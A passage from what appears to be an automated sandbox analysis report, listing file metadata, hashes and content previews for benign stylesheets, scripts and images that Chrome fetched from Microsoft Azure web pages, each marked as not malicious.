                                                                        Preview:[data-oc-token-text]{display:contents}..editorial-article--chapter .editorial-article__slot .block-heading h1,.editorial-article--chapter .editorial-article__slot .block-heading h2,.editorial-article--chapter .editorial-article__slot .block-heading h3,.editorial-article--chapter .editorial-article__slot .block-heading h4,.editorial-article--chapter .editorial-article__slot .block-heading h5,.editorial-article--chapter .editorial-article__slot .block-heading p{margin-block:var(--root-spacing-xl)}..editorial-article--chapter .editorial-article__slot .block-heading h1:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h2:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h3:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h4:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h5:first-child,.editorial-article--chapter .editorial-article__slot .block-heading p:first-child{ma
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):52717
                                                                        Entropy (8bit):5.462668685745912
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:413FCC759CC19821B61B6941808B29B5
                                                                        SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                        SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                        SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                        Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:downloaded
                                                                        Size (bytes):405
                                                                        Entropy (8bit):5.062225096849164
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:49565258B9A819768B104AC859524820
                                                                        SHA1:F30D2AC3D78097CD824FD618B7516E8E90B09394
                                                                        SHA-256:8168FF9C60C433A9FB775B2C00D267A8283887A3564D9483E7BD01103F9EF606
                                                                        SHA-512:619F2425BC9BF695E76CFD7D8349CD66BB78CE71260EB5F3502A2FBD3E67459D247B2CAE6280F0B553B81F57B3C986B01FFC82FDFBA504D71BAA50139C7C3C5E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/371220-productandservices-logos-featured-card3-windows?resMode=sharp2&op_usm=1.5,0.65,15,0&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:<svg width="28" height="28" viewBox="0 0 28 28" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M24.8442 3.15625H14.7383V13.2487H24.8442V3.15625Z" fill="#7DBD38"/>.<path d="M13.3559 3.15625H3.25V13.2487H13.3559V3.15625Z" fill="#F35013"/>.<path d="M24.8442 14.6562H14.7383V24.7487H24.8442V14.6562Z" fill="#FFB900"/>.<path d="M13.3559 14.6562H3.25V24.7487H13.3559V14.6562Z" fill="#299FDC"/>.</svg>.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):422
                                                                        Entropy (8bit):4.615395128455073
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2ADD065651AFB45E8C80967DD7B86A41
                                                                        SHA1:32A99770B83F754338EDF886571A91CEDD404F70
                                                                        SHA-256:3ECC4A2E8123EAD290D257F820C1CDAFB484A990B5D71AF3F6406CC85978B21B
                                                                        SHA-512:F0C2500211E649627495B98D3F040C834B4B3E53FDB31F78C7BED6D4421A70968BF5565BD57A2916423D2CE093FBB188AE78364F13DB31E2E5F589B043F90DFC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing.min.ACSHASH2add065651afb45e8c80967dd7b86a41.css
                                                                        Preview:[data-oc-product]:not([data-oc-product*=Success])>*{display:none !important}.[data-oc-product]:not([data-oc-product*=Success]) [data-oc-product="not-available"],[data-oc-product]:not([data-oc-product*=Success]) [data-oc-product="not-available"] *{display:block !important}.[data-ocr-product]:not([data-ocr-product*=Success]):has(.sku__unavailable) [data-oc-product]:not([data-oc-product*=Success]){display:none !important}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:dropped
                                                                        Size (bytes):685
                                                                        Entropy (8bit):5.034728367898433
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5230258C62809AABCDF5F68BF091899C
                                                                        SHA1:6BA8AB8858FDB46C7FBBB9784890A141D25EC0EC
                                                                        SHA-256:7EE3BF469607984A653D929CE069DB63FB7B1AABFB4053EF26D0245AF0ECC320
                                                                        SHA-512:C88BFEA273B611A98EC2D0267CB5B74894AA352C972A524DF26BE1AED6344CADFC0CB559CEF1D364F40BA3F83345EAE369975AEE3689320CEF7C85AC6903376C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:<svg width="43" height="32" viewBox="0 0 43 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_14404_11306)">.<path d="M0 14.9335C0 6.68606 6.65493 0.000183105 14.8642 0.000183105H28.1358C36.3451 0.000183105 43 6.68607 43 14.9335V17.0669C43 25.3143 36.3451 32.0002 28.1358 32.0002H0V14.9335Z" fill="white"/>.<ellipse cx="12.6195" cy="16.4706" rx="2.33696" ry="2.35294" fill="#004275"/>.<ellipse cx="21.0326" cy="16.4706" rx="2.33696" ry="2.35294" fill="#004275"/>.<ellipse cx="29.4457" cy="16.4706" rx="2.33696" ry="2.35294" fill="#004275"/>.</g>.<defs>.<clipPath id="clip0_14404_11306">.<rect width="43" height="32" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):57021
                                                                        Entropy (8bit):7.995852643124884
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:7616865ACFB942FBC66FFAC4EECD4F6B
                                                                        SHA1:517220343460E471F4A4F06C9E0B2A56D2497D32
                                                                        SHA-256:8EFB271C9590809BFBB0D9AACBA033A8E6C681737AD064FA41D84FB42422F908
                                                                        SHA-512:75AE3A348317C9C86B5277F8A443EAB9465717154EFD4227F127E48E9CABB6AFEFDBFDD41DE45C1BA9672761FAABA5F3EEA6208B6787810DB380FBE79DC3F37E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/resources-tab-4-2x?scl=1
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................mdat.....*s.O.....2...D<.0..P.XX.=a[..X&`...`...M1....{s.`.N...00n9/.....7]..H3.....B.!N.|{.......w9.-c.#....!.e%1.=F.T..8......}..s... ...'.=....^U......B....t.w..N.71....%r..u8....}.t..z.^.b@.$.\).......k...(....(?.GUAA8|p.n..."..Q....$..+..u..E}.(.c....&....O8...=..r._b..S.l.9yv...oE..B.....O.......U.R..m.....INe:..c...D...q..-.T8.....2.r."@....rs'%...F.t..t..t(..{Q.;.........A.;...../.f.W.Z.>.b.C&.W.w.......F..zkA.TZ]......5l.....*...B.lW*...4F.6#Z3pI..J...8....X...../.aY0....@........h...LP...tWM.p...&o>yv:..+_..a.`+...A.....o..............'.F..@.9.f...e..QO.o..,.$g.E.....I.&w(%..J.H...C..m..a#E.e.....bJ ^ '*.`...~W.......G"..v0.....X..&..wG.....c3.>0.[`.."L.......
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):11232
                                                                        Entropy (8bit):4.6331503450371505
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7FA2105E727E504AAF2557640251B9A6
                                                                        SHA1:341F9959BEC50971198680145E37E77177F83C6D
                                                                        SHA-256:C7AAA9B5376FDE8B3DE7A92A84E336A161D4232D6238874173B305CA32567D41
                                                                        SHA-512:378A637DF8E0905FBE992B8CC9F646A95640EDB4AE8A0ADCFA0DE5BF004B239FC3D5F742991BE0322C79EE72A7FA1F8E6CC68EEBC18BF205D1718FA845C7F7F7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine-page/clientlib-chatgpt-drawer.min.ACSHASH7fa2105e727e504aaf2557640251b9a6.js
                                                                        Preview:(() => {. const ATTRIBUTE_SELECTORS = {. DATA_MOUNT_CHAT_AI_DRAWER: '[data-mount="ai-chat-drawer"]',. };.. const ATTRIBUTES = {. IS_AUTHOR: 'data-is-author',. IS_ENV_PROD: 'data-is-env-prod',. PARAMS: 'data-params',. };.. const EventName = {. KEY_DOWN: 'keydown',. WEBCHAT_CONNECT_FULFILLED: 'webchatconnectfulfilled'. };.. const Selector = {. WEB_CHAT_FEED: '[role="feed"]',. FOOTNOTE_LINK: '.ac-horizontal-separator + .ac-container a, .webchat__link-definitions__list-item-box--as-link',. ACTION_SET_BUTTON: '.ac-pushButton:not(.action--ai-feedback)',. POSITIVE_FEEDBACK_BUTTON: '[id$="-positive"] .ac-pushButton',. NEGATIVE_FEEDBACK_BUTTON: '[id$="-negative"] .ac-pushButton',. RELATED_LINKS: '[id$="-related"] .ac-anchor'. };.. // Constant values for the AI Chat Drawer component.. const IS_AUTHOR = document.querySelector(ATTRIBUTE_SELECTORS.DATA_MOUNT_CHAT_AI_DRAWER).getAttribute
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):79688
                                                                        Entropy (8bit):7.997072104473572
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:122DE497EB12D8EEEE15FEE1C09821B4
                                                                        SHA1:AA553DD33A09E7BD426B708D38F7A99D5C1DD5A9
                                                                        SHA-256:6463E892195791517B779FC35DB72E69AE20DF51FE03CFF3034CF51794274ED9
                                                                        SHA-512:966993DF355DEA8972FC8AF9AD3ECCED59348927137F4A7B6E2553335350A4FF399149A0F2C0D4DAF9DCEF2153CD2C051FCF7CA31B90231310F61741C0B93AAC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/resources-tab-5-2x?scl=1
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............6....(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................66mdat.....*s.O.....2........1@.......e.#`K..|1...6'.tJ$....[..E.....8. j..-*@..6.$q. .?....gH.{p.`...}y.K..m..^.Z/.H.....Qii...I.(...W..J....|.?.c....3.V.4.....$..>..tt.9]x.r.&...j.e..xCV7.....u'./H..ga.....;J......!....D..~.N.a............f.V...7qu.+e61..f.<..1.8..#n..~+a...fh...K.o..7.......r\....g......e......M8Mr.@I.T.!.|.N..a.../B..vD<..'Z.t;.f..u.i.E...WMt...........X.&6;...T.ne.<.#8.?8;'.!.0~`.....O.2n..5.. ~xgu.].Y......wh.>..._.w..O.H.3:..Z8.....Wb...e...y...zq.1w.ps....,C.G..S.....`.......V.mf`_..x..A..|.......!"......%aM.a${...,.....8..9..a...S......_G~...*_[>..Y.....`XmQ..:.y...[`../..;.-S..g.u....;.[.....7.4BH.z...1..(.)y..d^BZ..R.....tr.l...n$.%..kX#..o.k..!.X
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 24x25, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:dropped
                                                                        Size (bytes):414
                                                                        Entropy (8bit):7.367762789973942
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3B3ADD6595E1FE576CAFC9319DB5A298
                                                                        SHA1:15BA54EE8E7420AA68A8DCCD40F56494ADB3838F
                                                                        SHA-256:048BE8E6F55BD91EB63297EC4C9261007C6C7FDB284FD77510F67F5177C18C6F
                                                                        SHA-512:8B236C04BC38FC64DCDC00039553B4AEADACD85752A0CEA2A01A74C14186ADAD6D4E34C624C7EE70861DC35C4D6EC2C70DBC0F2F5467E2FE2BA08E08540D2077
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8 .........*....>...B!.....q- .p.#.....p.W...G...!'.7.....S.W\...._d.3.<...n...)......v.B_.P..J...Pe....z._...........u.j.N.....,Ve.Ofp.z..?._.\.?.C....n3P.P...-.].S.m6....~..2.W.zf8... G..qr.l..%.+.....E...f ..8H..W...%.^b.D...R..p@...G......p.Av....4<...5....(h....zR...!\..*..P...9.....<}5.~....\....!....._=..).^..p.^1s.`..2.....d?~..ru.........6...h'..b..d....}.D<..H....&.+.....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (584)
                                                                        Category:dropped
                                                                        Size (bytes):5006
                                                                        Entropy (8bit):5.254875250489264
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2954890B89E77EADECA4558085241308
                                                                        SHA1:EE0E88A398434019AAA6EA8A38867494C585B31A
                                                                        SHA-256:06E35DF1A5074DA424B0FFB0BE44F5DAE4209C8C52F1F9C2FC53572509031831
                                                                        SHA-512:737CFA7B339504B4667D1AECD33C84F6E6FF9115CBA2C503126108D38B32326AE934BCC24F39116B3E6010D61489290DC9FB86B0625D9CC7082B426339F4E3F1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:'use strict';class FilterPanel{constructor(e){this.WRAPPER_ELEMENTS={tabList:e.tabList,tabPanel:e.tabPanel};this.SELECTORS={tabsWrapper:".tabs-wrapper",activeTab:".tab.active",activePillItem:".tab-panel.active .pill-bar__item.active",cardCarouselContainer:".appsource-grid-container",tabRole:"[role\x3dtab]"};this.MAPS={wrapperElements:{tabList:e.tabList,tabPanel:e.tabPanel},tabInstances:[],filterTabData:window.appsource.filterTabData};this.STRINGS={};this.CONFIG={filterTab_urlKey:"filterTab",filter_urlKey:"",.selectedTab:"categories",selectedTabDefault:"categories",selectedFilter:"ai-machine-learning",selectedFilterDefault:"ai-machine-learning",requiredURLParams:["filterTab","categories","industries","product"],isPageLoad:!0,isTabClick:!1,popstate:!1};this.ELEMENTS={};this._updateCards=()=>{};this._updateURL=()=>{const a=new URL(window.location.href),b=this._createQueryParams();this.CONFIG.requiredURLParams.forEach(c=>{a.searchParams.delete(c)});a.searchParams.set(this.CONFIG.filterTab_
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):258940
                                                                        Entropy (8bit):7.796243051570727
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:98DBCCF298D23F3959427CCB64F8E6E2
                                                                        SHA1:6FE202514C414FE74E1AB0A6B7BCB0C66E8E9AF2
                                                                        SHA-256:1AE3AE8902B15E6478C4628E17715C326ACF8EA58583D0085A6513DF7E5BC605
                                                                        SHA-512:5E6AFC06CBCEB2379A5F2BDF33BB837A65CC44E0060955A6DA3B2EF48DE3C4F34980FE3682EE3D66AA90C06B5D0019AA62B3F79DD50464A12A61E95ED036A5FE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFFt...WEBPVP8Lg.../....H.d;l..G~..o._0.%%D....*....Uj.....:.s...>.<..P....R..Y.?Ti..*..c./U.ts..?.O........6.{WU.&.u5w.....'...I.^.ue.@<.J..[Ko.}~.~...._.L.u.Vi......;9..S..R.@v,..7M'..Z#...v-........1...y.].'...i...K....Y:..H....K._......LRF.....v.&..j..I.{....%.|..$.......i..v..or_...w..KY...Jr......Q.[.Jww.......aI.cj...q.I.9..S=_.N.......t....K.$.6..8...j.....5..8'..i.U...r..9.1...(.u'@...c.Y%S....P.z..1a.T..@...f....2.cl...}.[...y...Hr$....q.T..VP. V4....+W...j[.$.b...0...8V..[..Q.[{..%.e7.B.."Z1.A..6n../B.......m.........x.`....."....*&...PQ(..1aBa..$.Q.c.6E,...l.....T.`..L!TT..bML...SB.0.m.......Q.=a.Jb.P.V..a.PQq..3t...uk4..cg.b.8.pn..Ta.<...o8B..G(...{Jvm&Eg..t.1.....a....Qo....vw...q'.n......S....a...s......^.../.........A. "A.b..>..h'..<..:.}......)^....l_..h4.jZ...g(.a.}...u.+~].u...D.Z,\......K.PH..]b2...k..x.7|\..............$".E.....Z8.V......|..$....?..Hgm..RK...\X...q..1H.dO.......u.4..................\{.Bg...r|.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1920x1080, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:downloaded
                                                                        Size (bytes):78078
                                                                        Entropy (8bit):7.997414664314059
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:F29FC9D54D1781340A0B88A886BAD306
                                                                        SHA1:5A2888BF5A193D47F2C4BEAE2E37C24D72D53289
                                                                        SHA-256:D968B8BA227CAFB1C90559E45717D232F82AC912319915B3AC80DF71017F1825
                                                                        SHA-512:F5B86F124E140B691F97D8DB8F7D200757D942833A4736056EA1768E63790474D484C3A9B58B8B7EFEFE664B98F44C8581820C228384672B22788A0BDEF969B5
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Azure-Solutions-Video_tbmnl_en-us?scl=1
                                                                        Preview:RIFF.0..WEBPVP8 .0..0....*..8.>I$.F"....2)!...gK-.^..?.......(c..:+...A...?......9......M.._.=....k...2.?.}".w.+....JO.....o.....Z.m.......>t}.R....5.r.W....._....).;.......o..._..Y.......s........s... >(...P.....U..+.....7._...5.>!....?........?..'.?.?.G..../.............W...'..aO.?............].......{..?..B.....w../P/.~.........._......vR....6....1.c.......N...#.....@1.....;`x..3H.it.#..I...l@ ......L..k..F.....G....g...^|...H._.U....-.Y.L!36Ps..>..W_.oQ.d..(..~fs..@Cj.e.aU....K.Z..."..q..Q.ZR.s0.G.W..V....z.:7.2Vt..AS;...lgtg.@.Z.......g...#...:l=.^..X.\S.....^.....@P..Cc3....1..zh..0.{A.X...A.........fj.,;$....b.3SB:.t>..P..2...h<..!.;$.A.Am_..H....%.As...J..q.=.}R..e.b.\..s..AT2]|Bx.-..e.J.yc{...J....Kl.....l..pA_..[..N.".> ..+~3.t..a...}XcK....g.nD>..i.*z.1k.3....{....2.3.~.1.+>y.ay.Z. ..(o.}=...U.'.....z..b..$,.o...W.N.\.e..o.......Y.=*.....a..&y.G...+ 3.M.t.x.y...O....Y|..$.t....P .k.?....,.~...5<...?T.z...... ...C....O.Xu....F..i...~vZ
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):194464
                                                                        Entropy (8bit):7.9984960976883634
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:50BF5390E8806B2A9D469530D239BC9C
                                                                        SHA1:DD7BF2FA3A96A43292161C3B9B1F95DB84A394F8
                                                                        SHA-256:D7221C1E0BB20690DEDFCBEA278957500C6F9E3BCD13C234460BF88A1AEECBA6
                                                                        SHA-512:500E1F2FC3D05872854F05A656B62BD8E9BC4A922F044621B27AEF5FFAB26D45A0CB15DCD45E8DF4A37E18995F4335D4CE73A68AB6239E4129EA52575414A6A6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-mobile-vertical-accordion-solutions-ai-tab-2-328x270?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=656&hei=540&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat.....&h.o.....2...D....'"....Ks....8..m.,.%.i.....t.8.o.....p.b.._j..Bm..H..u...K.V.P...O1..Ad1jvX....Y.^..HJ..];1..Z...L.b..w...D...._..2vL.P.h..4...P.x..>.1.o.l..V....!....S..W.5.|+.}1....i.8n9.O.........P...gd..=uB...p.._...%...y..R.i+.b?...._..s.`....)...... .....C..|.TR.....j..6....3...r}.,..]..*.;o.._........W.[.......H...k..2...WI..D.:F.u.~..g+.bT.r*/..'.......:.(..)...L...6.....l.......(.*3.lf.}.f%..A...(n)..9.-[u%.i.......@'.Aq.V.j[.f.N..#L.w.!.qD....'.U.F.h.2.v..g.PD..g...#>..>.Y{Y.V...q..C}B.c.Gf......u...%.:.V..TG.zm..Z...(P.a.zF.v....".6._.....UWB4k..7$h....\.o..........=Y.b...h.-0.....nnJ\7E.,.Z....K..B..b..~_..$.+..i).~..T].>J._g:.....W.".WQ.0../5.........D.m..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):90628
                                                                        Entropy (8bit):7.945403276278925
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4FF01D654325DB6DBFFF39F5B897EBC1
                                                                        SHA1:DCDE8D8E7B059AC45E9420FC07ADB8E7797B9630
                                                                        SHA-256:0DC8512370F18458C198B6F465FB570B4C237BB5D046037198352B7452E64CE1
                                                                        SHA-512:573D11075A7F7D72771D9F767A11D8180BE9FDC0AF8CA723872E62DA45D8F60801171D4F7BCE676304CEB76D75ED4E39856F8B4AA32BB1A449F3F38D93293946
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF.a..WEBPVP8L.a../?.....m.H..AfqH........;p.6..9.........n...ZZ}I.b... ..-.N..zJ..[}{........0.1...w..|.q.S..].cP.m......2C!................9.0>}k..p...D.8'wh.9....[:...p..m.G...BKVD..-..<.1.O.L.c..]w|tu..q...D.*.....g...CwX/2P......~m..m.q...K-....@.G...+l..../.?.@.1..iJ..3..].....m.`.?.vT....d.....Z...s.n.......k....w..l.6....}.D..GR..,.......F.(0..,....0...T...UF.h@,..al.5.G..LW.'v.U.....k....i....,U@ap~7w..]~0..l...fp.WC.2d..pc...n.4i...#....w..W.Ec....=}T........o...{>....%...!..).%.i.............].m....s....#Z_.......Y..C......]....4`A..l...<....g....G.6K.m...........l...:...!n....}..0!.....!"&..k.$I..._]UMD.l"53W.......[.1.C...............D.c.(7.l.r...oH.>..q?.[.......i.Y..2@.......=............t\...?F......[\.....8........y..W..0N.r,N} ..v.....q.c...RF,f...t*....e\.i..n.-._.8N...1...-/._... ..<..2&..elq.d.......,...<|.r..;.y...........b.?..h...M3mXn0.:.z.@.|T..B..x..[..,.2H..l.Ka@j_.l.@....24.e..4......"7..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JSON data
                                                                        Category:downloaded
                                                                        Size (bytes):51
                                                                        Entropy (8bit):4.243134106881671
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C4BDA196D8E483C55BD4FF45C2061474
                                                                        SHA1:AF571802E36FF3909CC5515CFD056A3B7AA17813
                                                                        SHA-256:090372DE497148A656441610005F8DA48B4B36201302E4342AD2BF4F5979E845
                                                                        SHA-512:3ABB9FC203B19293E0F24AFD53FD4AF9377A0C856007754971097CC980887271D642A2E3A3C415B7E905541D4C8A90B3266DE38DB62357A7570457CC2EDD7E17
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://c.go-mpulse.net/api/config.json?key=E7B88-8P87Z-VT9SJ-BNQSU-2GTUH&d=azure.microsoft.com&t=5779803&v=1.720.0&if=&sl=0&si=5618c203-97ba-4e27-8033-87ae148011b1-socd9k&plugins=AK,ConfigOverride,Continuity,PageParams,IFrameDelay,AutoXHR,SPA,History,Angular,Backbone,Ember,RT,CrossDomain,BW,PaintTiming,NavigationTiming,ResourceTiming,Memory,CACHE_RELOAD,Errors,TPAnalytics,UserTiming,Akamai,Early,EventTiming,LOGN&acao=&ak.ai=798188"
                                                                        Preview:{"site_domain":"arlid:798188","rate_limited":true}.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (534)
                                                                        Category:downloaded
                                                                        Size (bytes):3288
                                                                        Entropy (8bit):4.844125421768654
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7677F65C1626AB1BDE509437776D4291
                                                                        SHA1:E51C5E64E5ED9D95FFA2BB31B821229F4502BDA9
                                                                        SHA-256:76607654EAFACC56092479AD570B118BE287CB2341711030CE47A88AAEC760D2
                                                                        SHA-512:5A110A93A5B34B11D371140D59738C5659F2A54614F84C4E683D115E50852DEC3640A8CEE6F394D8584684E0C355C249F5636329B0AC03E73949DEC9423C2652
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-events.min.ACSHASH7677f65c1626ab1bde509437776d4291.js
                                                                        Preview:'use strict';const oc={event:{cookiesPostConsent:{name:"oc.event.cookiesPostConsent",lastdispatched:void 0,dispatch:function(){oc.event.cookiesPostConsent.lastdispatched=Date.now();document.dispatchEvent(new Event(oc.event.cookiesPostConsent.name))},onChanged:function(a){"function"==typeof a&&("undefined"==typeof oc.event.cookiesPostConsent.lastdispatched?document.addEventListener(oc.event.cookiesPostConsent.name,()=>{a()}):a())}},marketSelector:{name:"oc.event.marketSelector",lastInit:void 0,dispatch:function(a,.b){oc.event.marketSelector.lastInit=Date.now();var c=document.createEvent("CustomEvent");c.initCustomEvent(oc.event.marketSelector.name,!0,!0,{eventName:a,value:b});document.dispatchEvent(c)},onInit:function(a){"function"==typeof a&&("undefined"==typeof oc.event.marketSelector.lastdispatched?document.addEventListener(oc.event.marketSelector.name,b=>{"oninit"===b.detail.eventName&&a()}):a())},onSelect:function(a){document.addEventListener(oc.event.marketSelector.name,b=>{"onsel
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:C++ source, ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):2436
                                                                        Entropy (8bit):4.675816652909621
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3473C7D90BD072EDEE7D20686EB3FD28
                                                                        SHA1:82BF670C4E5D3DCF7E4BD8BCAC92A6EED0E87E45
                                                                        SHA-256:553B9C191998B0EA72FC6711D6F572C69A812531602EA8C6FFA0F188DFD36423
                                                                        SHA-512:974833D87C6295CA5CF485D1B7FE0F88B736F99803F893D858A048B00578D6FEC47A750FA75A4756CDD20571C4DDA0F8BA323E42C70D53E2998BAE61E5D9E33C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-ajaxutil.min.ACSHASH3473c7d90bd072edee7d20686eb3fd28.js
                                                                        Preview:class AjaxUtil {. constructor(opts) {. // Define the base URLs for different environments. const AUTHOR_BASE_URL = {. nonProd: "https://msonecloudapifd-nonprod-adg7arhndebhe8hd.z01.azurefd.net",. prod: "https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.net". };. . // Flag indicating if it's an author or non-author environment. const isAuthor = opts.isAuthor; . . // Flag indicating if it's a production or non-production environment. const isProd = opts.isProd; . . // If the 'host' option is provided, use it as the authorHost value; otherwise, select the appropriate base URL based on the isProd flag. const authorHost = AUTHOR_BASE_URL[isProd ? 'prod' : 'nonProd'];. . // Set the nonAuthorHost value as the origin of the current window. const nonAuthorHost = window.location.origin;. . // Set the baseUrl value based on whether it's an author environment or not. If isAuthor is true, use authorHost; otherwise,
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):145619
                                                                        Entropy (8bit):7.997833741918353
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:614A442E1AB9D15057475C48A4489C5A
                                                                        SHA1:B259F5947854B3F0E810D67D3C5B893A16032938
